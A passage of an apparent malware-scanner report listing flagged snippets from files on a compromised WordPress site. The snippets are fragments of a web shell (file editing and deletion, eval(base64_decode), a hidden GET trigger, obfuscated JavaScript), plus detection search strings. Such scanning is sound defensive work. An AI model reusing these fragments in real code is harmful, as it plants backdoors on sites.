</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_74").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/comment.section.1769473539.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:26:00</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:26:00</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_75" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
